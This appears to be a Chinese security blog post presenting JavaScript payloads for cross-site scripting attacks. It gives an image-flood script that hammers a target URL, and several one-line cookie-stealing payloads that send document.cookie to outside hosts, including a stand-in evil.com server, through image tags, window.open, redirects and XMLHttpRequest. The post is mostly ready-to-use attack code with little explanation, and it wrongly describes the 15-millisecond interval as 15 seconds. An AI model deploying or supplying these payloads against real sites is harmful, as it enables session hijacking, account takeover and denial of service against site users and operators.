xss 需要的JS 脚本(攻击和发送cookie)

作者: 耗子 分类: Web安全攻防 发布时间: 2017-02-25 09:08

攻击脚本

function imgflood() {  
  var target = 'url'
  var url = '/index.php?'
  var ac = new Image()
  var rand = Math.floor(Math.random() * 10000)
  ac.src = 'http://'+target+url+rand+'=val'
}
setInterval(imgflood, 15) 

 

//基本思想:创建一个图片,等到js加载时候会自动访问链接实现攻击。

其中Math.random()生成0到1个一个伪随机数,Math.floor向下取整,

setInterval是每隔15s,重新加载一次。

 

发送cookie脚本

document.write('<img src="https://yourserver.evil.com/getcookie.gif?cookie=' + document.cookie + '" />')


<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>


  <script>
    document.location="http://www.test.com/cookie.asp?cookie="+document.cookie
    </script>

    <img src="http://www.test.com/cookie.asp?cookie=+'document.cookie'"></img>

    var http = new XMLHttpRequest();
    http.open("GET", "http://localhost:2002?cookie="+encodeURIComponent(document.cookie), true);
    http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    http.send();

这里面是几种发送的方式,比较简单,就不解释了。

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注